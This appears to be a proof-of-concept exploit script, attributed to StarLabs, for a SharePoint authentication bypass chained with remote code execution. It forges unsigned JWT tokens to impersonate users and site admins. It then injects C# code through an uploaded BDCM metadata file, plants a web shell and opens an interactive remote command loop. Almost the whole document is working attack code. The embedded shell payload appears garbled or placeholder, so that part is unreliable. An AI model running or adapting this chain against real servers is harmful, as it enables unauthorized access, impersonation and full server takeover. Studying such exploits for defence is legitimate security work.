README.md
Rendering markdown...
# -*- coding: utf-8 -*-
import hashlib
import base64
import requests, string, struct, uuid, random, re
import sys
from collections import OrderedDict
from sys import version
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# too lazy to deal with string <-> bytes confusion in python3 so forget it ¯\_(ツ)_/¯
if version.startswith("3"):
print("[!!!!] Aborttttt, require python2 to run, current python version is: " + version)
exit(1)
import xml.etree.ElementTree as ET
from urlparse import urlparse
import logging
# logging setup
from logging import handlers
log = logging.getLogger('')
log.setLevel(logging.DEBUG)
format = logging.Formatter("%(asctime)s - %(levelname)s - %(message)s")
fh = handlers.RotatingFileHandler("debug.log", maxBytes=(1048576*5), backupCount=7)
fh.setFormatter(format)
log.addHandler(fh)
# i don't know
if len(sys.argv) != 2:
print("Usage: python "+sys.argv[0]+" http://sp2019")
print("It's recommended to use the site name instead of IPs")
exit(1)
SITE_USER = "user2"
USER = ""
# USER = "operator"
# TARGET = "http://splab/"
SID_PREFIX=""
SID=""
TARGET = sys.argv[1]
PROXY = {}
REQUEST_DIGEST = "Nope"
BACKUP_BDCM = ""
CLASS_NAME = "testanull"
EXPLOIT_STATUS = False
HIJACK_SHELL = True
STS_ACCESSIBLE = True
USE_STS = True
SHELL_PATH = "/_vti_bin/DelveApi.ashx/gift_from_starlabs/ghostshell" + str(random.randint(1000,9999)) + ".aspx"
MAL_CODE = """aaab{
class ABCD: System.Web.Services.Protocols.HttpWebClientProtocol{
static ABCD(){
System.Diagnostics.Process.Start("cmd.exe", "/c mspaint.exe");
}
}
}
namespace aabcd"""
while TARGET.endswith("/"):
TARGET = TARGET[:-1]
HOSTNAME = BACKUP_HOSTNAME = TARGET.replace("http://", "").replace("https://", "")
# I know, my code is dirty, but at least it works ¯\_(ツ)_/¯!
def logMsg(msg, printable=False):
log.info(msg)
if printable == True:
print(msg)
# memory web shell
def getMalCode():
global HIJACK_SHELL, CLASS_NAME, MAL_CODE
CLASS_NAME = "x0r"
if HIJACK_SHELL == True:
MAL_CODE = base64.b64decode("aGFja3hvciBidXNmYW1lIGNvbGFiIHRvcCAxIA==").replace("ckxo", CLASS_NAME)
return MAL_CODE
def id_generator(size=6, chars=string.ascii_lowercase + string.ascii_uppercase):
return ''.join(random.choice(chars) for _ in range(size))
def parseNtlmMsg(msg):
def decode_int(byte_string):
return int(byte_string[::-1].encode('hex'), 16)
def decode_string(byte_string):
return byte_string.replace('\x00', '')
target_info_fields = msg[40:48]
target_info_len = decode_int(target_info_fields[0:2])
target_info_offset = decode_int(target_info_fields[4:8])
target_info_bytes = msg[target_info_offset:target_info_offset+target_info_len]
MsvAvEOL = 0x0000
MsvAvNbComputerName = 0x0001
MsvAvNbDomainName = 0x0002
MsvAvDnsComputerName = 0x0003
MsvAvDnsDomainName = 0x0004
target_info = OrderedDict()
info_offset = 0
while info_offset < len(target_info_bytes):
av_id = decode_int(target_info_bytes[info_offset:info_offset+2])
av_len = decode_int(target_info_bytes[info_offset+2:info_offset+4])
av_value = target_info_bytes[info_offset+4:info_offset+4+av_len]
info_offset = info_offset + 4 + av_len
if av_id == MsvAvEOL:
pass
elif av_id == MsvAvNbComputerName:
target_info['MsvAvNbComputerName'] = decode_string(av_value)
elif av_id == MsvAvNbDomainName:
target_info['MsvAvNbDomainName'] = decode_string(av_value)
elif av_id == MsvAvDnsComputerName:
target_info['MsvAvDnsComputerName'] = decode_string(av_value)
elif av_id == MsvAvDnsDomainName:
target_info['MsvAvDnsDomainName'] = decode_string(av_value)
return target_info
def resolveTargetInfo():
burp0_url = TARGET + "/_api/web/"
burp0_headers = {
"Authorization": "NTLM TlRMTVNTUAABAAAAA7IIAAYABgAkAAAABAAEACAAAABIT1NURE9NQUlO",
"Host": HOSTNAME
}
rq = requests.get(burp0_url, headers=burp0_headers, proxies=PROXY, verify=False, allow_redirects=False)
if 'WWW-Authenticate' in rq.headers:
_neg_response = rq.headers['WWW-Authenticate']
if 'NTLM' in _neg_response:
encoded_msg = _neg_response.split('NTLM ')[1]
# Add padding if necessary
padding = len(encoded_msg) % 4
if padding:
encoded_msg += '=' * (4 - padding)
try:
msg2 = base64.b64decode(encoded_msg)
except base64.binascii.Error:
logMsg("[-] Invalid base64 encoding.")
exit()
ntlm_resp = parseNtlmMsg(msg2)
return ntlm_resp
else:
logMsg("[-] Target didn't use NTLM Auth, please check!")
exit()
else:
logMsg("[-] Target didn't respond to NTLM Auth, please check!")
exit()
def getOAuthInfo():
burp0_url = TARGET + "/_api/web"
burp0_headers = {
"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.eyJuYmYiOiIxNjczNDEwMzM0IiwiZXhwIjoiMTY5MzQxMDMzNCJ9.YWFh",
"Host": HOSTNAME
}
rq = requests.get(burp0_url, headers=burp0_headers, proxies=PROXY, verify=False, allow_redirects=False)
if 'WWW-Authenticate' in rq.headers:
msg = rq.headers['WWW-Authenticate']
realm = msg.split('realm="', 1)[-1].split('"', 1)[0]
client_id = msg.split('client_id="', 1)[-1].split('"', 1)[0]
return realm, client_id
else:
logMsg("[-] No auth negotiate message, please check!")
exit()
def genEndpointHash(url):
url = url.lower()
_hash = base64.b64encode(hashlib.sha256(url).digest())
return _hash
def base64UrlEncode(data):
return base64.urlsafe_b64encode(data).rstrip(b'=')
def genProofToken(url, username=""):
if url.startswith('https://'):
url = url.replace(TARGET, 'https://' + HOSTNAME)
else:
url = url.replace(TARGET, 'http://' + HOSTNAME)
if SID == "":
if username=="":
username = USER
jwt_token = '{"iss":"'+CLIENT_ID+'","aud": "'+CLIENT_ID+'/'+HOSTNAME+'@'+REALM+'","nbf":"1673410334","exp":"1725093890","nameid":"c#.w|' + username + '", "http://schemas.microsoft.com/sharepoint/2009/08/claims/userlogonname":"'+ username +'", "appidacr":"0", "isuser":"0", "http://schemas.microsoft.com/office/2012/01/nameidissuer":"AccessToken", "ver":"hashedprooftoken","endpointurl": "'+genEndpointHash(url)+'", "isloopback": "true","userid":"llunatset", "appctx":"user_impersonation"}'
b64_token = base64UrlEncode(jwt_token)
proof_token = 'eyJhbGciOiAibm9uZSJ9.'+b64_token+'.YWFh'
return proof_token
else:
return genTokenSid(url, SID)
def genAppProofToken(url, username=""):
if url.startswith('https://'):
url = url.replace(TARGET, 'https://' + HOSTNAME)
else:
url = url.replace(TARGET, 'http://' + HOSTNAME)
if SID == "":
if username=="":
username = USER
jwt_token = '{"iss":"'+CLIENT_ID+'","aud": "'+CLIENT_ID+'/'+HOSTNAME+'@'+REALM+'","nbf":"1673410334","exp":"1725093890","nameid":"c#.w|' + username + '", "http://schemas.microsoft.com/sharepoint/2009/08/claims/userlogonname":"'+ username +'", "appidacr":"0", "isuser":"0", "http://schemas.microsoft.com/office/2012/01/nameidissuer":"AccessToken", "ver":"hashedprooftoken","endpointurl": "'+genEndpointHash(url)+'", "isloopback": "true","userid":"llunatset", "appctx":"user_impersonation"}'
jwt_token = '{"iss":"00000003-0000-0ff1-ce00-000000000000","aud":"00000003-0000-0ff1-ce00-000000000000@'+REALM+'","nbf":"1673410334","exp":"1725093890","nameid":"00000003-0000-0ff1-ce00-000000000000@'+REALM+'", "ver":"hashedprooftoken","endpointurl": "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=","endpointurlLength": 1, "isloopback": "true"}'
b64_token = base64UrlEncode(jwt_token)
proof_token = 'eyJhbGciOiAibm9uZSJ9.'+b64_token+'.YWFh'
return proof_token
else:
return genTokenSid(url, SID)
def genTokenSid(url, sid):
global SID_PREFIX
if TARGET.startswith('https://'):
url = url.replace(TARGET, 'https://' + HOSTNAME)
else:
url = url.replace(TARGET, 'http://' + HOSTNAME)
jwt_token = '{"iss":"' + CLIENT_ID + '","aud": "' + CLIENT_ID + '/' + HOSTNAME + '@' + REALM + '","nbf":"1673410334","exp":"1725093890","nameid": "' + sid +'", "nii": "urn:office:idp:activedirectory", "appidacr":"0", "isuser":"0", "ver":"hashedprooftoken","endpointurl": "' + genEndpointHash(url)+'","isloopback": "true","appctx":"user_impersonation"}'
b64_token = base64UrlEncode(jwt_token)
return 'eyJhbGciOiAibm9uZSJ9.'+b64_token+'.YWFh'
def tryLoginSid(sid):
burp0_url = TARGET + "/_api/web/currentuser"
token = genTokenSid(burp0_url, sid)
burp0_headers = {"Host": HOSTNAME, "Accept-Encoding": "gzip, deflate", "Accept": "*/*", "User-Agent": "python-requests/2.27.1", "X-PROOF_TOKEN": token, "Authorization": "Bearer "+token}
try:
rq = requests.get(burp0_url, headers=burp0_headers, proxies=PROXY)
if rq.status_code == 200:
logMsg("[+] Found user with sid: " + sid, True)
return sid
else:
return False
except:
return False
def probeUser():
global SID
#try 500
sid = SID_PREFIX + '-500'
sid = tryLoginSid(sid)
if sid != False:
SID = sid
else:
#try 1100
i = 1100
while True:
sid = SID_PREFIX + "-" + str(i)
if tryLoginSid(sid):
SID = sid
break
i = 1000 if i > 1200 else i + 1
if i == 1100:
break
def sendGetReq(url, user=""):
token = genAppProofToken(url, user)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Host": HOSTNAME}
rq = requests.get(url, headers=headers, proxies=PROXY, verify=False, allow_redirects=False)
return rq
def sendJsonRequest(url, data):
token = genAppProofToken(url)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Content-type": "application/json",
"Host": HOSTNAME }
rq = requests.post(url, headers=headers, json=data, proxies=PROXY, verify=False, allow_redirects=False)
return rq
def getCurrentUser():
ct = sendGetReq(TARGET+"/_api/web/currentuser")
if ct.status_code != 200:
logMsg("[-] Failed to get current user", True)
return False
return ct.content
def getSiteAdmin():
rq = sendGetReq(TARGET + "/_vti_bin/listdata.svc/UserInformationList?$filter=IsSiteAdmin eq true")
if rq.status_code != 200:
print("[-] Failed to bypass authentication, abort!!")
print("[-] Status_code is: "+ str(rq.status_code))
print("[-] Page content: "+ rq.content)
exit(1)
ct = rq.content
if "true</d:IsSiteAdmin>" not in ct:
print("[-] Cannot get Site Admin")
return False
spl = ct.split('<entry')
for i in spl:
if "true</d:IsSiteAdmin>" in i:
spl2 = i.split('<d:Account>')[1].split('</d:Account>')[0].split('|')[1]
return spl2
def getSiteAdminFromMySite():
global HOSTNAME
rq = sendGetReq(TARGET + "/my/_vti_bin/listdata.svc/UserInformationList?$filter=IsSiteAdmin eq true", "NT AUTHORITY\\\\LOCAL SERVICE")
# sendGetReq(TARGET + "/my/_api/web/currentuser", "NT AUTHORITY\\\\LOCAL SERVICE")
if rq.status_code != 200:
if rq.status_code == 401:
#bad site name
HOSTNAME = BACKUP_HOSTNAME
logMsg("[+] Wrong sharepoint site name, trying the original one", True)
rq = sendGetReq(TARGET + "/my/_vti_bin/listdata.svc/UserInformationList?$filter=IsSiteAdmin eq true", "NT AUTHORITY\\\\LOCAL SERVICE")
if rq.status_code != 200:
logMsg("[+] Wrong sharepoint site name, please check again!", True)
return False
ct = rq.content
if "true</d:IsSiteAdmin>" not in ct:
print("[-] Cannot get Site Admin")
return False
spl = ct.split('<entry')
for i in spl:
if "true</d:IsSiteAdmin>" in i:
spl2 = i.split('<d:Account>')[1].split('</d:Account>')[0].split('|')[1]
return spl2
def getSiteAdmin2():
global HOSTNAME
token = genAppProofToken(TARGET + "/_vti_bin/listdata.svc/UserInformationList?$filter=IsSiteAdmin eq true")
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Host": HOSTNAME}
rq = requests.get(TARGET + "/_vti_bin/listdata.svc/UserInformationList?$filter=IsSiteAdmin eq true", headers=headers, proxies=PROXY, verify=False, allow_redirects=False)
# sendGetReq(TARGET + "/my/_api/web/currentuser", "NT AUTHORITY\\\\LOCAL SERVICE")
if rq.status_code != 200:
logMsg("[+] Wrong sharepoint site name, please check again!", True)
return False
ct = rq.content
if "true</d:IsSiteAdmin>" not in ct:
print("[-] Cannot get Site Admin")
return False
spl = ct.split('<entry')
for i in spl:
if "true</d:IsSiteAdmin>" in i:
spl2 = i.split('<d:Account>')[1].split('</d:Account>')[0].split('|')[1]
return spl2
def createBDCMpayload():
global LOBID
burp0_url = TARGET + "/_api/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm',overwrite=true)"
token = genAppProofToken(burp0_url)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Content-type": "application/x-www-form-urlencoded",
"Host": HOSTNAME}
burp0_data = "<?xml version=\"1.0\" encoding=\"utf-8\"?><Model xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" Name=\"BDCMetadata\" xmlns=\"http://schemas.microsoft.com/windows/2007/BusinessDataCatalog\"><LobSystems><LobSystem Name=\"" + LOBID + "\" Type=\"WebService\"><Properties><Property Name=\"WsdlFetchUrl\" Type=\"System.String\">http://localhost:32843/SecurityTokenServiceApplication/securitytoken.svc?singleWsdl</Property><Property Name=\"WebServiceProxyNamespace\" Type=\"System.String\"><![CDATA[" + getMalCode() + "]]></Property><Property Name=\"WsdlFetchAuthenticationMode\" Type=\"System.String\">RevertToSelf</Property></Properties><LobSystemInstances><LobSystemInstance Name=\"" + LOBID + "\"></LobSystemInstance></LobSystemInstances><Entities><Entity Name=\"Products\" DefaultDisplayName=\"Products\" Namespace=\"ODataDemo\" Version=\"1.0.0.0\" EstimatedInstanceCount=\"2000\"><Properties><Property Name=\"ExcludeFromOfflineClientForList\" Type=\"System.String\">False</Property></Properties><Identifiers><Identifier Name=\"ID\" TypeName=\"System.Int32\" /></Identifiers><Methods><Method Name=\"ToString\" DefaultDisplayName=\"Create Product\" IsStatic=\"false\"><Parameters><Parameter Name=\"@ID\" Direction=\"In\"><TypeDescriptor Name=\"ID\" DefaultDisplayName=\"ID\" TypeName=\"System.String\" IdentifierName=\"ID\" CreatorField=\"true\" /></Parameter><Parameter Name=\"@CreateProduct\" Direction=\"Return\"><TypeDescriptor Name=\"CreateProduct\" TypeName=\"System.Object\"></TypeDescriptor></Parameter></Parameters><MethodInstances><MethodInstance Name=\"CreateProduct\" Type=\"GenericInvoker\" ReturnParameterName=\"@CreateProduct\"><AccessControlList><AccessControlEntry Principal=\"STS|SecurityTokenService|http://sharepoint.microsoft.com/claims/2009/08/isauthenticated|true|http://www.w3.org/2001/XMLSchema#string\"><Right BdcRight=\"Execute\" /></AccessControlEntry></AccessControlList></MethodInstance></MethodInstances></Method></Methods></Entity></Entities></LobSystem></LobSystems></Model>"
rq = requests.post(burp0_url, headers=headers, data=burp0_data, verify=False, allow_redirects=False, proxies=PROXY)
return rq
def execCmd(_entityId, _liIdentity):
burp0_url = TARGET + "/_vti_bin/client.svc/ProcessQuery"
token = genAppProofToken(burp0_url)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Content-type": "application/x-www-form-urlencoded",
"Host": HOSTNAME}
burp0_data = "<Request AddExpandoFieldTypeSuffix=\"true\" SchemaVersion=\"15.0.0.0\" LibraryVersion=\"16.0.0.0\" ApplicationName=\".NET Library\" xmlns=\"http://schemas.microsoft.com/sharepoint/clientquery/2009\"><Actions><ObjectPath Id=\"21\" ObjectPathId=\"20\" /><ObjectPath Id=\"23\" ObjectPathId=\"22\" /></Actions><ObjectPaths><Method Id=\"20\" ParentId=\"7\" Name=\"Execute\"><Parameters><Parameter Type=\"String\">CreateProduct</Parameter><Parameter ObjectPathId=\"17\" /><Parameter Type=\"Array\"><Object Type=\"String\">1</Object></Parameter></Parameters></Method><Property Id=\"22\" ParentId=\"20\" Name=\"ReturnParameterCollection\" /><Identity Id=\"7\" Name=\"" + _entityId + "\" /><Identity Id=\"17\" Name=\"" + _liIdentity + "\" /></ObjectPaths></Request>"
rq = requests.post(burp0_url, headers=headers, data=burp0_data, verify=False, allow_redirects=False, proxies=PROXY)
if rq.status_code == 200:
return True
else:
return False
def spawnCmd():
try:
while True:
cmd = raw_input("cmd > ").strip()
if cmd.lower() in ['exit', 'quit']:
exit(0)
token = genAppProofToken(TARGET + SHELL_PATH)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Host": HOSTNAME,
"cmd": cmd}
rq = requests.get(TARGET + SHELL_PATH, headers=headers, verify=False, allow_redirects=False, proxies=PROXY)
if rq.status_code == 401:
logMsg("[-] w3wp.exe may crashed and the backdoor is gone, try exploiting again!", True)
exit(0)
print(rq.content)
except:
logMsg("[-] Exception while exec!", True)
print("[!] PoC by Jang (@testanull) from StarLabs 2023")
print("=========")
logMsg("[!] Attacking target: " + TARGET, True)
ntlm_resp = resolveTargetInfo()
HOSTNAME = sharepoint_site = ntlm_resp['MsvAvDnsComputerName'].split(".")[0]
domain = ntlm_resp['MsvAvNbDomainName']
logMsg("[!] Sharepoint site is: "+ sharepoint_site, True)
logMsg("[!] Domain: "+ domain, True)
REALM, CLIENT_ID = getOAuthInfo()
LOBID = id_generator(8)
_currentUser = getCurrentUser()
if _currentUser != False:
_currentUser = _currentUser.split('<d:LoginName>')[1].split('</d:LoginName>')[0]
if "|" in _currentUser:
_currentUser = _currentUser.split('|')[1]
USER = _currentUser
else:
if STS_ACCESSIBLE == False:
logMsg("[!!] Oh no, STS is not available!")
logMsg("[+] Authentication bypassed!!!", True)
# if _getUserResp != False and 'true</d:IsSiteAdmin>' not in _getUserResp:
# logMsg("[+] Privilege escalating ...", True)
# _siteAdmin = getSiteAdmin()
# logMsg("[+] Found site admin: " + _siteAdmin, True)
# if _siteAdmin != False:
# USER = _siteAdmin.replace("\\", "\\\\")
# SID = ""
_currentUser = getCurrentUser()
if _currentUser != False:
if 'true</d:IsSiteAdmin>' in _currentUser:
logMsg("[+] Successful impersonate Site Admin: " + USER, True)
_currentUser = _currentUser.split('<d:LoginName>')[1].split('</d:LoginName>')[0]
if "|" in _currentUser:
_currentUser = _currentUser.split('|')[1]
logMsg("[+] Got Oauth Info: " + REALM + "|" + CLIENT_ID)
logMsg("[+] Delivering payload ...", True)
rq = sendGetReq(TARGET + "/_api/web/GetFolderByServerRelativeUrl('/')/Folders")
if rq.status_code == 200 and 'BusinessDataMetadataCatalog' in rq.content:
logMsg("[+] BDCMetadata existed, backuping original data.")
try:
rq = sendGetReq(TARGET + "/_api/web/GetFileByServerRelativePath(decodedurl='/BusinessDataMetadataCatalog/BDCMetadata.bdcm')/$value")
BACKUP_BDCM = rq.content
if rq.status_code == 200:
try:
f = open("bdcm.bak", "wb")
f.write(rq.content)
f.close()
except:
logMsg("[-] Failed to backup BDCM content, saving it to memory")
except:
pass
else:
body = {
"ServerRelativeUrl": "/BusinessDataMetadataCatalog/"
}
rq = sendJsonRequest(TARGET + '/_api/web/folders', body)
if rq.status_code == 201:
logMsg("[+] Created BDCM folder")
else:
logMsg("[-] Failed to create BDCM folder")
logMsg("[+] Lob_id: " + LOBID)
_createBDCM = createBDCMpayload()
if _createBDCM.status_code == 200:
logMsg("[+] Success delivered payload", True)
_entityId = str(uuid.uuid4()) + "|4da630b6-36c5-4f55-8e01-5cd40e96104d:entityfile:Products,ODataDemo"
_lobSystemInstance = str(uuid.uuid4()) + "|4da630b6-36c5-4f55-8e01-5cd40e96104d:lsifile:" + LOBID + "," + LOBID
exp_rq = execCmd(_entityId, _lobSystemInstance)
if HIJACK_SHELL == True:
token = genAppProofToken(TARGET + SHELL_PATH)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Host": HOSTNAME}
rq = requests.get(TARGET + SHELL_PATH, verify=False, headers=headers, allow_redirects=False, proxies=PROXY)
if rq.status_code == 200:
logMsg("[+] Exploit successfully!", True)
EXPLOIT_STATUS = True
else:
logMsg("[+] Can't reach the backdoor, take a manual check!", True)
logMsg("[+] Cleaning up!", True)
burp0_url = TARGET + "/_api/web/GetFolderByServerRelativeUrl('/BusinessDataMetadataCatalog/')/Files/add(url='/BusinessDataMetadataCatalog/BDCMetadata.bdcm',overwrite=true)"
token = genAppProofToken(burp0_url)
headers={"X-PROOF_TOKEN": token,
"Authorization": "Bearer " + token,
"Content-type": "application/x-www-form-urlencoded",
"Host": HOSTNAME
}
try:
rq = requests.post(burp0_url, headers=headers, data=BACKUP_BDCM, verify=False, allow_redirects=False, proxies=PROXY)
except:
logMsg("[-] Failed to restore original data")
if EXPLOIT_STATUS == True:
spawnCmd()